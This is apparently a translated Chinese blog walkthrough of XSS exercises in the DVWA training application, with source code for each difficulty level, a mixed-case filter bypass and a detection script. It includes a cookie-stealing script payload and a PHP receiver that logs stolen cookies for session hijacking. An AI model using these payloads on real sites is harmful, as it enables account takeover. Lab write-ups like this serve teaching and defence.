![1.4 DVWA亲测XSS漏洞 1.4 DVWA亲测XSS漏洞](https://image.shishitao.com:8440/aHR0cHM6Ly9pbWFnZXMyMDE4LmNuYmxvZ3MuY29tL2Jsb2cvMTM0NDM5Ni8yMDE4MDQvMTM0NDM5Ni0yMDE4MDQxMjExNDAyMjI3NC0xNDk2NzI5NTQ1LnBuZw%3D%3D.png?w=700&webp=1)
Where:
- XSS (DOM): DOM-based XSS
- XSS (Reflected): reflected XSS
![1.4 DVWA亲测XSS漏洞 1.4 DVWA亲测XSS漏洞](https://image.shishitao.com:8440/aHR0cHM6Ly9pbWFnZXMyMDE4LmNuYmxvZ3MuY29tL2Jsb2cvMTM0NDM5Ni8yMDE4MDQvMTM0NDM5Ni0yMDE4MDQxMjExNDA0NTgzNi0xMzc5ODcxMzcxLnBuZw%3D%3D.png?w=700&webp=1)
![1.4 DVWA亲测XSS漏洞 1.4 DVWA亲测XSS漏洞](https://image.shishitao.com:8440/aHR0cHM6Ly9pbWFnZXMyMDE4LmNuYmxvZ3MuY29tL2Jsb2cvMTM0NDM5Ni8yMDE4MDQvMTM0NDM5Ni0yMDE4MDQxMjExNDA1NjEzNC0yODQyMDc1OTAucG5n.png?w=700&webp=1)
![1.4 DVWA亲测XSS漏洞 1.4 DVWA亲测XSS漏洞](https://image.shishitao.com:8440/aHR0cHM6Ly9pbWFnZXMyMDE4LmNuYmxvZ3MuY29tL2Jsb2cvMTM0NDM5Ni8yMDE4MDQvMTM0NDM5Ni0yMDE4MDQxMjExNDE1OTY2Ny00NDQ3OTgzMzkucG5n.png?w=700&webp=1)
Next we enter `<xss>` and click Submit.
This shows that inserting an HTML tag changes the page, so we try a JavaScript popup.
![1.4 DVWA亲测XSS漏洞 1.4 DVWA亲测XSS漏洞](https://image.shishitao.com:8440/aHR0cHM6Ly9pbWFnZXMyMDE4LmNuYmxvZ3MuY29tL2Jsb2cvMTM0NDM5Ni8yMDE4MDQvMTM0NDM5Ni0yMDE4MDQxMjExNDI1NDEyNy0yMDA4MTI1OTg3LnBuZw%3D%3D.png?w=700&webp=1)
This shows the site is vulnerable to XSS. If we enter `<script>document.location='http://127.0.0.1/cookie.php?cookie='+document.cookie</script>`, we obtain the victim's cookie.
```php
<?php
// cookie.php: receives the cookie value and writes it to a file
$cookie = $_GET['cookie'];
file_put_contents('cookie.txt', $cookie);
?>
```
The resulting URL:

```
http://127.0.0.1/DVWA/vulnerabilities/xss_r/?name=<script>document.location='http://127.0.0.1/cookie.php?cookie='+document.cookie;</script>
```
![1.4 DVWA亲测XSS漏洞 1.4 DVWA亲测XSS漏洞](https://image.shishitao.com:8440/aHR0cHM6Ly9pbWFnZXMyMDE4LmNuYmxvZ3MuY29tL2Jsb2cvMTM0NDM5Ni8yMDE4MDQvMTM0NDM5Ni0yMDE4MDQxMjExNDQxNTUyNS05MDU3OTU1NzUucG5n.png?w=700&webp=1)
4. After that, we open index.php directly and find that we are logged in as the victim and can do whatever we want.
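The cookie-theft request above leaves a trace in the vulnerable server's access log. As an added example (not from the original post), this Python script scans Apache-style log lines, decodes every query parameter, and flags values that contain a raw `<` or reference `document.cookie`; the log lines, timestamps and sizes are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache-style access-log lines (sample data, not taken from the post).
# Line 2 carries the cookie-theft payload from the walkthrough, line 3 the mixed-case probe.
SAMPLE_LOG = """\
127.0.0.1 - - [12/Apr/2018:11:44:15 +0800] "GET /DVWA/vulnerabilities/xss_r/?name=alice HTTP/1.1" 200 4123
127.0.0.1 - - [12/Apr/2018:11:44:16 +0800] "GET /DVWA/vulnerabilities/xss_r/?name=%3Cscript%3Edocument.location%3D%27http%3A%2F%2F127.0.0.1%2Fcookie.php%3Fcookie%3D%27%2Bdocument.cookie%3B%3C%2Fscript%3E HTTP/1.1" 200 4200
127.0.0.1 - - [12/Apr/2018:11:44:17 +0800] "GET /DVWA/vulnerabilities/xss_r/?name=%3CScRiPt%3Ealert(%27xss%27)%3C/ScRiPt%3E HTTP/1.1" 200 4150
"""

# Pull method and request target out of the quoted request line.
REQUEST_RE = re.compile(r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+"')


def suspicious_params(target: str) -> list:
    """Return (param, decoded_value) pairs whose value looks like markup or cookie access."""
    hits = []
    query = urlsplit(target).query
    for key, values in parse_qs(query, keep_blank_values=True).items():
        for value in values:
            decoded = unquote(value)  # second pass catches double-encoded payloads
            if "<" in decoded or "document.cookie" in decoded.lower():
                hits.append((key, decoded))
    return hits


def scan_log(text: str) -> list:
    """Return (path, hits) for every request line carrying a suspicious parameter."""
    findings = []
    for line in text.splitlines():
        match = REQUEST_RE.search(line)
        if not match:
            continue
        hits = suspicious_params(match.group("target"))
        if hits:
            findings.append((urlsplit(match.group("target")).path, hits))
    return findings


if __name__ == "__main__":
    for path, hits in scan_log(SAMPLE_LOG):
        for param, value in hits:
            print(f"{path} param={param!r} value={value!r}")
```

Set the session cookie with the HttpOnly flag as well: `document.cookie` then cannot read it, so the payload above exfiltrates nothing even if the injection succeeds.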
![1.4 DVWA亲测XSS漏洞 1.4 DVWA亲测XSS漏洞](https://image.shishitao.com:8440/aHR0cHM6Ly9pbWFnZXMyMDE4LmNuYmxvZ3MuY29tL2Jsb2cvMTM0NDM5Ni8yMDE4MDQvMTM0NDM5Ni0yMDE4MDQxMjExNDQzNTQyMy0xNjY0MzUzMjI2LnBuZw%3D%3D.png?w=700&webp=1)
![1.4 DVWA亲测XSS漏洞 1.4 DVWA亲测XSS漏洞](https://image.shishitao.com:8440/aHR0cHM6Ly9pbWFnZXMyMDE4LmNuYmxvZ3MuY29tL2Jsb2cvMTM0NDM5Ni8yMDE4MDQvMTM0NDM5Ni0yMDE4MDQxMjExNDQ0NDM0Mi0xOTk0NjU2Nzk3LnBuZw%3D%3D.png?w=700&webp=1)
First we enter `<script>alert('xss')</script>` and click Submit.
![1.4 DVWA亲测XSS漏洞 1.4 DVWA亲测XSS漏洞](https://image.shishitao.com:8440/aHR0cHM6Ly9pbWFnZXMyMDE4LmNuYmxvZ3MuY29tL2Jsb2cvMTM0NDM5Ni8yMDE4MDQvMTM0NDM5Ni0yMDE4MDQxMjExNDQ1NzkxNS0xNTMyMjA3NTk0LnBuZw%3D%3D.png?w=700&webp=1)
![1.4 DVWA亲测XSS漏洞 1.4 DVWA亲测XSS漏洞](https://image.shishitao.com:8440/aHR0cHM6Ly9pbWFnZXMyMDE4LmNuYmxvZ3MuY29tL2Jsb2cvMTM0NDM5Ni8yMDE4MDQvMTM0NDM5Ni0yMDE4MDQxMjExNDUyOTQzOC01ODgwMzUzNTkucG5n.png?w=700&webp=1)
2. `<ScRiPt>` mixed-case bypass
![1.4 DVWA亲测XSS漏洞 1.4 DVWA亲测XSS漏洞](https://image.shishitao.com:8440/aHR0cHM6Ly9pbWFnZXMyMDE4LmNuYmxvZ3MuY29tL2Jsb2cvMTM0NDM5Ni8yMDE4MDQvMTM0NDM5Ni0yMDE4MDQxMjExNDU0Mjc1Mi0xNjE0NDEyMjQxLnBuZw%3D%3D.png?w=700&webp=1)
![1.4 DVWA亲测XSS漏洞 1.4 DVWA亲测XSS漏洞](https://image.shishitao.com:8440/aHR0cHM6Ly9pbWFnZXMyMDE4LmNuYmxvZ3MuY29tL2Jsb2cvMTM0NDM5Ni8yMDE4MDQvMTM0NDM5Ni0yMDE4MDQxMjExNDYwMzgxMy0yMzIyNDYxNDgucG5n.png?w=700&webp=1)
![1.4 DVWA亲测XSS漏洞 1.4 DVWA亲测XSS漏洞](https://image.shishitao.com:8440/aHR0cHM6Ly9pbWFnZXMyMDE4LmNuYmxvZ3MuY29tL2Jsb2cvMTM0NDM5Ni8yMDE4MDQvMTM0NDM5Ni0yMDE4MDQxMjExNDYxNDQ1MC0yNDE3MzkwODYucG5n.png?w=700&webp=1)
First we enter `<script>alert('xss')</script>` and click Submit.
![1.4 DVWA亲测XSS漏洞 1.4 DVWA亲测XSS漏洞](https://image.shishitao.com:8440/aHR0cHM6Ly9pbWFnZXMyMDE4LmNuYmxvZ3MuY29tL2Jsb2cvMTM0NDM5Ni8yMDE4MDQvMTM0NDM5Ni0yMDE4MDQxMjExNDYyNTIxMi04MjMxMjI2OTcucG5n.png?w=700&webp=1)
![1.4 DVWA亲测XSS漏洞 1.4 DVWA亲测XSS漏洞](https://image.shishitao.com:8440/aHR0cHM6Ly9pbWFnZXMyMDE4LmNuYmxvZ3MuY29tL2Jsb2cvMTM0NDM5Ni8yMDE4MDQvMTM0NDM5Ni0yMDE4MDQxMjExNDY1MjYyOC0xOTk1MzIyNDkucG5n.png?w=700&webp=1)
![1.4 DVWA亲测XSS漏洞 1.4 DVWA亲测XSS漏洞](https://image.shishitao.com:8440/aHR0cHM6Ly9pbWFnZXMyMDE4LmNuYmxvZ3MuY29tL2Jsb2cvMTM0NDM5Ni8yMDE4MDQvMTM0NDM5Ni0yMDE4MDQxMjExNDcwMzMyOC05NTcxOTk5MzQucG5n.png?w=700&webp=1)
![1.4 DVWA亲测XSS漏洞 1.4 DVWA亲测XSS漏洞](https://image.shishitao.com:8440/aHR0cHM6Ly9pbWFnZXMyMDE4LmNuYmxvZ3MuY29tL2Jsb2cvMTM0NDM5Ni8yMDE4MDQvMTM0NDM5Ni0yMDE4MDQxMjExNDcyMDg2Ni0xMDU2MzA4MzQucG5n.png?w=700&webp=1)
![1.4 DVWA亲测XSS漏洞 1.4 DVWA亲测XSS漏洞](https://image.shishitao.com:8440/aHR0cHM6Ly9pbWFnZXMyMDE4LmNuYmxvZ3MuY29tL2Jsb2cvMTM0NDM5Ni8yMDE4MDQvMTM0NDM5Ni0yMDE4MDQxMjExNDczNTM4MC0yMDY4MDYyODAzLnBuZw%3D%3D.png?w=700&webp=1)
First we enter `<script>alert('xss')</script>` and click Submit.
![1.4 DVWA亲测XSS漏洞 1.4 DVWA亲测XSS漏洞](https://image.shishitao.com:8440/aHR0cHM6Ly9pbWFnZXMyMDE4LmNuYmxvZ3MuY29tL2Jsb2cvMTM0NDM5Ni8yMDE4MDQvMTM0NDM5Ni0yMDE4MDQxMjExNDc1NDA1OS0xMzU4MzUwNjY1LnBuZw%3D%3D.png?w=700&webp=1)
We find the code is output verbatim. Inspecting the element with Firebug:
![1.4 DVWA亲测XSS漏洞 1.4 DVWA亲测XSS漏洞](https://image.shishitao.com:8440/aHR0cHM6Ly9pbWFnZXMyMDE4LmNuYmxvZ3MuY29tL2Jsb2cvMTM0NDM5Ni8yMDE4MDQvMTM0NDM5Ni0yMDE4MDQxMjExNDgwNDI1MC0xMTk2Mjc2NjIyLnBuZw%3D%3D.png?w=700&webp=1)
```php
<?php
// Is there any input?
if( array_key_exists( "name", $_GET ) && $_GET[ 'name' ] != NULL ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $name = htmlspecialchars( $_GET[ 'name' ] );

    // Feedback for end user
    $html .= "<pre>Hello ${name}</pre>";
}

// Generate Anti-CSRF token
generateSessionToken();
?>
```
![1.4 DVWA亲测XSS漏洞 1.4 DVWA亲测XSS漏洞](https://image.shishitao.com:8440/aHR0cHM6Ly9pbWFnZXMyMDE4LmNuYmxvZ3MuY29tL2Jsb2cvMTM0NDM5Ni8yMDE4MDQvMTM0NDM5Ni0yMDE4MDQxMjExNDg0MTYxMC0xMTg3MTI0Njk1LnBuZw%3D%3D.png?w=700&webp=1)
![1.4 DVWA亲测XSS漏洞 1.4 DVWA亲测XSS漏洞](https://image.shishitao.com:8440/aHR0cHM6Ly9pbWFnZXMyMDE4LmNuYmxvZ3MuY29tL2Jsb2cvMTM0NDM5Ni8yMDE4MDQvMTM0NDM5Ni0yMDE4MDQxMjExNDg1ODAxOS0xODY2MDk3MzI2LnBuZw%3D%3D.png?w=700&webp=1)
![1.4 DVWA亲测XSS漏洞 1.4 DVWA亲测XSS漏洞](https://image.shishitao.com:8440/aHR0cHM6Ly9pbWFnZXMyMDE4LmNuYmxvZ3MuY29tL2Jsb2cvMTM0NDM5Ni8yMDE4MDQvMTM0NDM5Ni0yMDE4MDQxMjExNDkwNzE3My0xMTg2MTUwODc5LnBuZw%3D%3D.png?w=700&webp=1)
It is a guestbook-style page.
First we try entering
The input comes out incomplete; presumably the input field has a length limit.
![1.4 DVWA亲测XSS漏洞 1.4 DVWA亲测XSS漏洞](https://image.shishitao.com:8440/aHR0cHM6Ly9pbWFnZXMyMDE4LmNuYmxvZ3MuY29tL2Jsb2cvMTM0NDM5Ni8yMDE4MDQvMTM0NDM5Ni0yMDE4MDQxMjExNDk0NTk4OC0yODc0NTY4NzIucG5n.png?w=700&webp=1)
As expected.
![1.4 DVWA亲测XSS漏洞 1.4 DVWA亲测XSS漏洞](https://image.shishitao.com:8440/aHR0cHM6Ly9pbWFnZXMyMDE4LmNuYmxvZ3MuY29tL2Jsb2cvMTM0NDM5Ni8yMDE4MDQvMTM0NDM5Ni0yMDE4MDQxMjExNTAwNDUxOC0yMTE1NjcyNjQ0LnBuZw%3D%3D.png?w=700&webp=1)
![1.4 DVWA亲测XSS漏洞 1.4 DVWA亲测XSS漏洞](https://image.shishitao.com:8440/aHR0cHM6Ly9pbWFnZXMyMDE4LmNuYmxvZ3MuY29tL2Jsb2cvMTM0NDM5Ni8yMDE4MDQvMTM0NDM5Ni0yMDE4MDQxMjExNTAxNjk1MS0yMDY3Nzk3Njk5LnBuZw%3D%3D.png?w=700&webp=1)
Then we modify the request:
![1.4 DVWA亲测XSS漏洞 1.4 DVWA亲测XSS漏洞](https://image.shishitao.com:8440/aHR0cHM6Ly9pbWFnZXMyMDE4LmNuYmxvZ3MuY29tL2Jsb2cvMTM0NDM5Ni8yMDE4MDQvMTM0NDM5Ni0yMDE4MDQxMjExNTAzNDk3MS0xNjg2MzI1MjkzLnBuZw%3D%3D.png?w=700&webp=1)
![1.4 DVWA亲测XSS漏洞 1.4 DVWA亲测XSS漏洞](https://image.shishitao.com:8440/aHR0cHM6Ly9pbWFnZXMyMDE4LmNuYmxvZ3MuY29tL2Jsb2cvMTM0NDM5Ni8yMDE4MDQvMTM0NDM5Ni0yMDE4MDQxMjExNTExNDc5MC05MjMzODcyNDQucG5n.png?w=700&webp=1)
![1.4 DVWA亲测XSS漏洞 1.4 DVWA亲测XSS漏洞](https://image.shishitao.com:8440/aHR0cHM6Ly9pbWFnZXMyMDE4LmNuYmxvZ3MuY29tL2Jsb2cvMTM0NDM5Ni8yMDE4MDQvMTM0NDM5Ni0yMDE4MDQxMjExNTEyNjE0NS0xNDIwODc0MzkxLnBuZw%3D%3D.png?w=700&webp=1)
![1.4 DVWA亲测XSS漏洞 1.4 DVWA亲测XSS漏洞](https://image.shishitao.com:8440/aHR0cHM6Ly9pbWFnZXMyMDE4LmNuYmxvZ3MuY29tL2Jsb2cvMTM0NDM5Ni8yMDE4MDQvMTM0NDM5Ni0yMDE4MDQxMjExNTE0NDkwNi0xODMwNjYwMjc2LnBuZw%3D%3D.png?w=700&webp=1)
![1.4 DVWA亲测XSS漏洞 1.4 DVWA亲测XSS漏洞](https://image.shishitao.com:8440/aHR0cHM6Ly9pbWFnZXMyMDE4LmNuYmxvZ3MuY29tL2Jsb2cvMTM0NDM5Ni8yMDE4MDQvMTM0NDM5Ni0yMDE4MDQxMjExNTE1MzU5NS01NjE1Nzc0NTYucG5n.png?w=700&webp=1)
We find that the name field still limits the number of characters, but we already gave the workaround at the Low level, so it is not repeated here.
![1.4 DVWA亲测XSS漏洞 1.4 DVWA亲测XSS漏洞](https://image.shishitao.com:8440/aHR0cHM6Ly9pbWFnZXMyMDE4LmNuYmxvZ3MuY29tL2Jsb2cvMTM0NDM5Ni8yMDE4MDQvMTM0NDM5Ni0yMDE4MDQxMjExNTIxNjQ0Ni0xNzE4OTgwMTkucG5n.png?w=700&webp=1)
We find that the `<script>` tag is filtered; we have already given the workaround for this too, so it is not repeated.
```php
<?php
if( isset( $_POST[ 'btnSign' ] ) ) {
    // Get input
    $message = trim( $_POST[ 'mtxMessage' ] );
    $name    = trim( $_POST[ 'txtName' ] );

    // Sanitize message input
    $message = strip_tags( addslashes( $message ) );
    $message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $message = htmlspecialchars( $message );

    // Sanitize name input
    $name = str_replace( '<script>', '', $name );
    $name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Update database
    $query  = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
    $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    //mysql_close();
}
?>
```
![1.4 DVWA亲测XSS漏洞 1.4 DVWA亲测XSS漏洞](https://image.shishitao.com:8440/aHR0cHM6Ly9pbWFnZXMyMDE4LmNuYmxvZ3MuY29tL2Jsb2cvMTM0NDM5Ni8yMDE4MDQvMTM0NDM5Ni0yMDE4MDQxMjExNTIzMjAwMi0xNzA5NDY3OTcyLnBuZw%3D%3D.png?w=700&webp=1)
After clicking Submit:
We try entering `<script>alert('xss')</script>` in the Message field.
![1.4 DVWA亲测XSS漏洞 1.4 DVWA亲测XSS漏洞](https://image.shishitao.com:8440/aHR0cHM6Ly9pbWFnZXMyMDE4LmNuYmxvZ3MuY29tL2Jsb2cvMTM0NDM5Ni8yMDE4MDQvMTM0NDM5Ni0yMDE4MDQxMjExNTI1NzQwOC0zNjI1MjY4MjIucG5n.png?w=700&webp=1)
```php
<?php
if( isset( $_POST[ 'btnSign' ] ) ) {
    // Get input
    $message = trim( $_POST[ 'mtxMessage' ] );
    $name    = trim( $_POST[ 'txtName' ] );

    // Sanitize message input
    $message = strip_tags( addslashes( $message ) );
    $message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $message = htmlspecialchars( $message );

    // Sanitize name input
    $name = preg_replace( '/<(.*)s(.*)c(.*)r(.*)i(.*)p(.*)t/i', '', $name );
    $name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Update database
    $query  = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
    $result = mysqli_query($GLOBALS["___mysqli_ston"], $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    //mysql_close();
}
?>
```
![1.4 DVWA亲测XSS漏洞 1.4 DVWA亲测XSS漏洞](https://image.shishitao.com:8440/aHR0cHM6Ly9pbWFnZXMyMDE4LmNuYmxvZ3MuY29tL2Jsb2cvMTM0NDM5Ni8yMDE4MDQvMTM0NDM5Ni0yMDE4MDQxMjExNTMxOTU0OC0zMjExOTQ3Ny5wbmc%3D.png?w=700&webp=1)
Now let's look at the code first.
```php
<?php
if( isset( $_POST[ 'btnSign' ] ) ) {
    // Check Anti-CSRF token
    checkToken( $_REQUEST[ 'user_token' ], $_SESSION[ 'session_token' ], 'index.php' );

    // Get input
    $message = trim( $_POST[ 'mtxMessage' ] );
    $name    = trim( $_POST[ 'txtName' ] );

    // Sanitize message input
    $message = stripslashes( $message );
    $message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $message = htmlspecialchars( $message );

    // Sanitize name input
    $name = stripslashes( $name );
    $name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"], $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $name = htmlspecialchars( $name );

    // Update database
    $data = $db->prepare( 'INSERT INTO guestbook ( comment, name ) VALUES ( :message, :name );' );
    $data->bindParam( ':message', $message, PDO::PARAM_STR );
    $data->bindParam( ':name', $name, PDO::PARAM_STR );
    $data->execute();
}

// Generate Anti-CSRF token
generateSessionToken();
?>
```
Characters that `mysqli_real_escape_string` escapes:
- `\x00` (NUL)
- `\n`
- `\r`
- `\`
- `'`
- `"`
- `\x1a` (Control-Z)